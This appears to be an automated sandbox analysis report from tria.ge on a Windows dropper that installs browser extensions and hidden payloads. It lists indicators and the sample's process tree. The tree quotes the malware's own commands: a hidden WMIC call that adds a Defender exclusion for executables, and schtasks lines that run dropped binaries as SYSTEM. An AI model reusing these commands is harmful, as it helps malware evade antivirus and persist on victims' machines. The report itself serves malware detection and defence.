Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240319-en -
resource tags
arch:x64arch:x86image:win11-20240319-enlocale:en-usos:windows11-21h2-x64system -
submitted
10/04/2024, 17:00
Static task
static1
Behavioral task
behavioral1
Sample
40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe
Resource
win10v2004-20231215-en
General
-
Target
40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe
-
Size
6.4MB
-
MD5
c784f63128fa10418c64241ffc8d8e9e
-
SHA1
5b8d6566a98c71fc1394de3de6f15874c327ba21
-
SHA256
40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243
-
SHA512
61f83bcb8a942a9b7e2028127dbb715396167ced1b95319dbf64e16868f231954763b7c0f85bf9540d36eee202385c5ae46ce526e105f34981ffee728803cf4d
-
SSDEEP
98304:91OStCheY8CeaL3od2rNGNdMdSa1zJTH4DcftNHjoIOO:91OSUheY8CLodwGNOdSa7MsoIOO
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 16 3980 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1233663403-1277323514-675434005-1000\Control Panel\International\Geo\Nation JnHyQAL.exe -
Executes dropped EXE 3 IoCs
pid Process 4704 Install.exe 1128 rKbERyb.exe 4172 JnHyQAL.exe -
Loads dropped DLL 1 IoCs
pid Process 3980 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json JnHyQAL.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json JnHyQAL.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini JnHyQAL.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft JnHyQAL.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol rKbERyb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 JnHyQAL.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 JnHyQAL.exe File created C:\Windows\system32\GroupPolicy\gpt.ini rKbERyb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 JnHyQAL.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content JnHyQAL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA JnHyQAL.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\VQnigEewLHUn\FZNnzLO.dll JnHyQAL.exe File created C:\Program Files (x86)\feaAGXZTPHSTZufvckR\JeXVAue.dll JnHyQAL.exe File created C:\Program Files (x86)\CsUgOGApU\hFfRJMW.xml JnHyQAL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi JnHyQAL.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi JnHyQAL.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak JnHyQAL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja JnHyQAL.exe File created C:\Program Files (x86)\eBaLNwdfBoAU2\PITLvpj.xml JnHyQAL.exe File created C:\Program Files (x86)\feaAGXZTPHSTZufvckR\cEAFCnu.xml JnHyQAL.exe File created C:\Program Files (x86)\YXRVthYkCAsAC\DPynuNG.dll JnHyQAL.exe File created C:\Program Files (x86)\CsUgOGApU\LYwOmk.dll JnHyQAL.exe File created C:\Program Files (x86)\eBaLNwdfBoAU2\iLHYzwYOkmnkd.dll JnHyQAL.exe File created C:\Program Files (x86)\YXRVthYkCAsAC\BoCDqLt.xml JnHyQAL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak JnHyQAL.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\TVsECgUtwDhLZifMW.job schtasks.exe File created C:\Windows\Tasks\jHYEWeDFllXYdol.job schtasks.exe File created C:\Windows\Tasks\IypqguOSOyxhMfXuI.job schtasks.exe File created C:\Windows\Tasks\bHNJINcAmGBfsLXkXG.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5084 schtasks.exe 4160 schtasks.exe 896 schtasks.exe 1620 schtasks.exe 412 schtasks.exe 780 schtasks.exe 3212 schtasks.exe 5092 schtasks.exe 1372 schtasks.exe 3112 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket JnHyQAL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" JnHyQAL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer rKbERyb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing JnHyQAL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 988 powershell.exe 988 powershell.exe 2152 powershell.exe 2152 powershell.exe 2008 powershell.exe 2008 powershell.exe 4284 powershell.EXE 4284 powershell.EXE 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4900 powershell.exe 4900 powershell.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe 4172 JnHyQAL.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 988 powershell.exe Token: SeIncreaseQuotaPrivilege 1408 WMIC.exe Token: SeSecurityPrivilege 1408 WMIC.exe Token: SeTakeOwnershipPrivilege 1408 WMIC.exe Token: SeLoadDriverPrivilege 1408 WMIC.exe Token: SeSystemProfilePrivilege 1408 WMIC.exe Token: SeSystemtimePrivilege 1408 WMIC.exe Token: SeProfSingleProcessPrivilege 1408 WMIC.exe Token: SeIncBasePriorityPrivilege 1408 WMIC.exe Token: SeCreatePagefilePrivilege 1408 WMIC.exe Token: SeBackupPrivilege 1408 WMIC.exe Token: SeRestorePrivilege 1408 WMIC.exe Token: SeShutdownPrivilege 1408 WMIC.exe Token: SeDebugPrivilege 1408 WMIC.exe Token: SeSystemEnvironmentPrivilege 1408 WMIC.exe Token: SeRemoteShutdownPrivilege 1408 WMIC.exe Token: SeUndockPrivilege 1408 WMIC.exe Token: SeManageVolumePrivilege 1408 WMIC.exe Token: 33 1408 WMIC.exe Token: 34 1408 WMIC.exe Token: 35 1408 WMIC.exe Token: 36 1408 WMIC.exe Token: SeIncreaseQuotaPrivilege 1408 WMIC.exe Token: SeSecurityPrivilege 1408 WMIC.exe Token: SeTakeOwnershipPrivilege 1408 WMIC.exe Token: SeLoadDriverPrivilege 1408 WMIC.exe Token: SeSystemProfilePrivilege 1408 WMIC.exe Token: SeSystemtimePrivilege 1408 WMIC.exe Token: SeProfSingleProcessPrivilege 1408 WMIC.exe Token: SeIncBasePriorityPrivilege 1408 WMIC.exe Token: SeCreatePagefilePrivilege 1408 WMIC.exe Token: SeBackupPrivilege 1408 WMIC.exe Token: SeRestorePrivilege 1408 WMIC.exe Token: SeShutdownPrivilege 1408 WMIC.exe Token: SeDebugPrivilege 1408 WMIC.exe Token: SeSystemEnvironmentPrivilege 1408 WMIC.exe Token: SeRemoteShutdownPrivilege 1408 WMIC.exe Token: SeUndockPrivilege 1408 WMIC.exe Token: SeManageVolumePrivilege 1408 WMIC.exe Token: 33 1408 WMIC.exe Token: 34 1408 WMIC.exe Token: 35 1408 WMIC.exe Token: 36 1408 WMIC.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 4284 powershell.EXE Token: SeDebugPrivilege 4900 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1428 WMIC.exe Token: SeIncreaseQuotaPrivilege 1428 WMIC.exe Token: SeSecurityPrivilege 1428 WMIC.exe Token: SeTakeOwnershipPrivilege 1428 WMIC.exe Token: SeLoadDriverPrivilege 1428 WMIC.exe Token: SeSystemtimePrivilege 1428 WMIC.exe Token: SeBackupPrivilege 1428 WMIC.exe Token: SeRestorePrivilege 1428 WMIC.exe Token: SeShutdownPrivilege 1428 WMIC.exe Token: SeSystemEnvironmentPrivilege 1428 WMIC.exe Token: SeUndockPrivilege 1428 WMIC.exe Token: SeManageVolumePrivilege 1428 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1428 WMIC.exe Token: SeIncreaseQuotaPrivilege 1428 WMIC.exe Token: SeSecurityPrivilege 1428 WMIC.exe Token: SeTakeOwnershipPrivilege 1428 WMIC.exe Token: SeLoadDriverPrivilege 1428 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3520 wrote to memory of 4704 3520 40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe 81 PID 3520 wrote to memory of 4704 3520 40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe 81 PID 3520 wrote to memory of 4704 3520 40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe 81 PID 4704 wrote to memory of 3656 4704 Install.exe 83 PID 4704 wrote to memory of 3656 4704 Install.exe 83 PID 4704 wrote to memory of 3656 4704 Install.exe 83 PID 3656 wrote to memory of 1192 3656 forfiles.exe 85 PID 3656 wrote to memory of 1192 3656 forfiles.exe 85 PID 3656 wrote to memory of 1192 3656 forfiles.exe 85 PID 1192 wrote to memory of 988 1192 cmd.exe 86 PID 1192 wrote to memory of 988 1192 cmd.exe 86 PID 1192 wrote to memory of 988 1192 cmd.exe 86 PID 988 wrote to memory of 1408 988 powershell.exe 87 PID 988 wrote to memory of 1408 988 powershell.exe 87 PID 988 wrote to memory of 1408 988 powershell.exe 87 PID 4704 wrote to memory of 5092 4704 Install.exe 89 PID 4704 wrote to memory of 5092 4704 Install.exe 89 PID 4704 wrote to memory of 5092 4704 Install.exe 89 PID 1128 wrote to memory of 2152 1128 rKbERyb.exe 92 PID 1128 wrote to memory of 2152 1128 rKbERyb.exe 92 PID 1128 wrote to memory of 2152 1128 rKbERyb.exe 92 PID 2152 wrote to memory of 1876 2152 powershell.exe 94 PID 2152 wrote to memory of 1876 2152 powershell.exe 94 PID 2152 wrote to memory of 1876 2152 powershell.exe 94 PID 1876 wrote to memory of 2036 1876 cmd.exe 95 PID 1876 wrote to memory of 2036 1876 cmd.exe 95 PID 1876 wrote to memory of 2036 1876 cmd.exe 95 PID 2152 wrote to memory of 3212 2152 powershell.exe 96 PID 2152 wrote to memory of 3212 2152 powershell.exe 96 PID 2152 wrote to memory of 3212 2152 powershell.exe 96 PID 2152 wrote to memory of 4896 2152 powershell.exe 97 PID 2152 wrote to memory of 4896 2152 powershell.exe 97 PID 2152 wrote to memory of 4896 2152 powershell.exe 97 PID 2152 wrote to memory of 4144 2152 powershell.exe 98 PID 2152 wrote to memory of 4144 2152 powershell.exe 98 PID 2152 wrote to memory of 4144 2152 powershell.exe 98 PID 2152 wrote to memory of 1212 2152 powershell.exe 99 PID 2152 wrote to memory of 1212 2152 powershell.exe 99 PID 2152 wrote to memory of 1212 2152 powershell.exe 99 PID 2152 wrote to memory of 4348 2152 powershell.exe 100 PID 2152 wrote to memory of 4348 2152 powershell.exe 100 PID 2152 wrote to memory of 4348 2152 powershell.exe 100 PID 2152 wrote to memory of 4880 2152 powershell.exe 101 PID 2152 wrote to memory of 4880 2152 powershell.exe 101 PID 2152 wrote to memory of 4880 2152 powershell.exe 101 PID 2152 wrote to memory of 2912 2152 powershell.exe 102 PID 2152 wrote to memory of 2912 2152 powershell.exe 102 PID 2152 wrote to memory of 2912 2152 powershell.exe 102 PID 2152 wrote to memory of 4676 2152 powershell.exe 103 PID 2152 wrote to memory of 4676 2152 powershell.exe 103 PID 2152 wrote to memory of 4676 2152 powershell.exe 103 PID 2152 wrote to memory of 4608 2152 powershell.exe 104 PID 2152 wrote to memory of 4608 2152 powershell.exe 104 PID 2152 wrote to memory of 4608 2152 powershell.exe 104 PID 2152 wrote to memory of 4784 2152 powershell.exe 105 PID 2152 wrote to memory of 4784 2152 powershell.exe 105 PID 2152 wrote to memory of 4784 2152 powershell.exe 105 PID 2152 wrote to memory of 4548 2152 powershell.exe 106 PID 2152 wrote to memory of 4548 2152 powershell.exe 106 PID 2152 wrote to memory of 4548 2152 powershell.exe 106 PID 2152 wrote to memory of 2176 2152 powershell.exe 107 PID 2152 wrote to memory of 2176 2152 powershell.exe 107 PID 2152 wrote to memory of 2176 2152 powershell.exe 107 PID 2152 wrote to memory of 4884 2152 powershell.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe"C:\Users\Admin\AppData\Local\Temp\40c661874eafefe097996635fd2f9ae1c3892da4be2a8961a000837d2d974243.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe.\Install.exe /bCUydidahlzr "385118" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bHNJINcAmGBfsLXkXG" /SC once /ST 17:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\rKbERyb.exe\" kg /HJsite_idKzg 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5092
-
-
-
C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\rKbERyb.exeC:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\rKbERyb.exe kg /HJsite_idKzg 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1128 -
